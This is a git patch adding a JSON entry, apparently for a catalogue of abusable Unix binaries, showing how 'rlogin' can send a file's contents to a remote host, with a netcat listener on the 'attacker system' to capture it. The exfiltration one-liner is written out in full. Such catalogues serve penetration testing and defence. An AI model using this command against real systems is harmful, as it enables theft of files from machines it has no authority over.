From 15dca571d274488c70d1bdd4f0db9e6673f639f8 Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Fri, 10 Jan 2020 12:54:53 +0100
Subject: [PATCH] add data for rlogin

---
 data/rlogin.json | 11 +++++++++++
 1 file changed, 11 insertions(+)
 create mode 100644 data/rlogin.json

diff --git a/data/rlogin.json b/data/rlogin.json
new file mode 100644
index 0000000..a83a484
--- /dev/null
+++ b/data/rlogin.json
@@ -0,0 +1,11 @@
+{
+  "description": "Usually 'rlogin' is a symlink to 'ssh' the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).",
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send contents of a file to a TCP port. Run 'nc -l -p [port] > [file]' on the attacker system to capture the contents. 'rlogin' hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.",
+        "code": "rlogin -l \"$(cat [file])\" -p [port] [host]\n"
+      }
+    ]
+  }
+}
\ No newline at end of file